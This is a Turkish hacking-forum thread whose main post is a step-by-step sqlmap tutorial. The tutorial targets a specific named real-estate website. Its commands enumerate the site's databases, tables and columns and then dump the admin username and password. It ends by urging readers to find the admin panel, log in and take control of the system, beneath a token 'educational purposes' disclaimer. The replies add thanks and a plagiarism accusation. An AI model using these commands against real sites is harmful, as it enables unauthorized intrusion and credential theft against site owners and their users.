Sqlmap ile adminpanel bulucu web site bilgilerini çekme

casper52

Yeni üye
10 Ara 2015
2
1
Sqlmap İle AdminPanel Bulucu


Sqlmap, Sql tabanlı sitelerin güvenliğini denetlemek için kullanılan oldukça pratik bir araçtır. Normalde Linux üzerinden çalışır fakat Windows için olanı da mevcuttur; Windows için olanı çizgisel arabirime sahiptir, Linux için olanı ise komut satırı arayüzüne sahiptir..

Bir kaç (Ç)alıntı ile sql, sql injection ve sqlmap kavramlarını tanıdık.

Sqlmap, Kali linux, Backbox gibi pentest dağıtımlarında yüklü olarak gelir.
Kali Linux kullanmıyorsanız aşağıdaki komut ile sqlmap uygulamasını git deposundan edinebilirsiniz.
git clone git://git.kali.org/packages/sqlmap.git Sqlmap uygulamasını Git deposundan indirebilmeniz için sisteminizde Git paketinin yüklü olması gerekmektedir. Git paketi yüklü değilse yukarıdaki komutu uçbirimde çalıştırdığınızda hata alırsınız. Git paketini yüklemek için aşağıdaki komutu uçbirimde çalıştırmanız gerekiyor.
sudo apt install git Sqlmap uygulamasını edindiğimize göre sqlmap dizinine geçebiliriz.
cd sqlmap llk olarak kendimize bir hedef site belirlememiz gerekiyor. (nerden bulcam ben sql açıklı siteyi? derseniz Sql Açıklı site bulma programını buradan indirebilirsiniz.Dilerseniz, bir hedef site belirleyebilir, bu sitedeki açıkları buradaki yazılım ile bulabilirsiniz.)

İlk komutumuzda kullanacağımız parametreleri bir tanıyalım.
-u parametresi hedef siteyi belirtmektedir. Parametrenin yanına sql hatasını aldığımız URL'yi yazarız.
--dbs komutu ise bizim databaseleri çekmemize yarayan komuttur.

Aşağıdaki komutu uçbirimde çalıştırarak başlayalım.
Kali Linux kullanıyorsanız python ./sqlmap.py yerine sqlmap yazmalısınız.
python ./sqlmap.py -u "http://ceburealproperty.com/show_cat_page.php?id=3'" --dbs Databaseleri çekmeye başlamadan önce bize işlemi onaylayıp onaylamadığımızı soracaktır. E diyerek onaylıyoruz.İşlemin bitmesini bekliyoruz.
hedef sitedeki databaseler görünmekte. "information_schema" isimli database MySql kullanan tüm sistemlerde bulunur. Hiç bir zaman veriler "information_schema" isimli databasede saklanmaz.

--dbs paramatresini -D olarak değiştirip yanına database ismini ekliyoruz.
Hedef sitemizdeki database ismi cebureal_db. Bu durumda parametremiz -D cebureal_db şeklinde olmalı.

Paramatremizi değiştirdikten sonra komutun sonuna --tables paramatresini ekliyoruz.
--tables parametresi database'deki table'leri, yani veritabanındaki tabloları çekecek.
Komutun son hali aşağıdaki gibi. Aşağıdaki komutu uçbirimde çalıştırarak table'leri çekelim
python ./sqlmap.py -u "http://ceburealproperty.com/show_cat_page.php?id=3'" -D cebureal_db --tablesBurada kullanıcı bilgilerini barındıran table'yi bulmamız gerekiyor. Genelde admin, user gibi isimler olur.
Bu sitede table admin olarak isimlendirilmiş. Admin giriş bilgileri burada.

Yukarıda yaptığımız işlemin aynısını burada da yapıyoruz. --table paramatresini -T admin olarak değiştiyoruz. Çünkü tablomuzun ismi "admin". "admin" değilde "user" olsaydı "-T user" olurdu değil mi?

Değişikliğimizi yaptıktan sonra komutun sonuna --columns paramatresini ekliyoruz.
--columns paramatresi tablo altındaki kolonları çekecek.
python ./sqlmap.py -u "http://ceburealproperty.com/show_cat_page.php?id=3'" -D cebureal_db -T admin --columns

İşlem süresi siteden sisteye değişmekte.
3 tane kolon var. Burada bana lazım olanı almam gerekiyor. Yani username ve password.
Her adımda parametrelerimizde oynadığımız gibi burada da oynuyoruz.
--columns parametresini -C olarak değiştiriyoruz. Parametrenin son hali -C username,password şeklinde olmalı. -C parametresinin yanına çekmek istediğimiz kolonları virgül(,) ile ayırarak yazıyoruz.

Kolonları belirttikten sonra komutun sonuna --dump parametresini ekliyoruz.
--dump parametresi kolon içindeki dataları çekecek.
python ./sqlmap.py -u "http://ceburealproperty.com/show_cat_page.php?id=3'" -D cebureal_db -T admin -C username,password --dumpAdminlerin kullanıcı adları ve şifreleri görülmekte.
Sql açığını kullarak adminin şifresine ve kullanıcı adına ulaştınız.

Tabi her zaman datalar bu şekilde çıkmaz. Md5 olarak şifreyi verebilir, sizinde bu Md5'i kırmanız gerekebilir. Artık tek yapmanız gereken sitenin admin panelini bulup girmek. Admin panelini bulmak için yazılmış onlarca uygulama bulunmakta.

HMqpl_Vb.png

Burdan admın panel bulucudan sisteme sızıp sqlmap ile çektiğimiz admın password buraya yazıp sistem sizin elinizde olur .

NOT: Arkadaşlar bu anlatımımı kendim hazırlayıp eğitim amaçlı anlatmaktayımdır. Yalnız olabilecek herhangi bir sorunlardan siz yapmış olduğunuz sonuçlar sizi ilgilendirir UNUTMAYIN BİLİŞİM SUÇLARI HERHANGİ bir tespit ettiğinde o zaman çok büyük bir sıkıntı olur herkese kolay gelsin arkadaşlar . . .
. :RpS_thumbup::RpS_thumbup::RpS_thumbup::RpS_thumbup:
 

casper52

Yeni üye
10 Ara 2015
2
1
Redlion12 tabiki var kardeşim
TC635mm saolasın kardeşim teşekkür ederim eğer faydalı olduysam
allgor herkes ınanmak zorunda değil önemli olan yapabilmek araştırmak senin gibi olumsuz dşünenler ancak öyle boş boş konuşur saygılar . . .
 

allgor

Yeni üye
16 Ağu 2015
2
0
@Casper52 googlede sqlmap sorgusundaki ilk siteden almışsin sqlmap yazısını. oradaki panel finder programıyla birleştirip ben yazdım benim diye paylaşıyosun. sende anca senin gibi insanları kandırırsın. kendiniz olun biraz
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.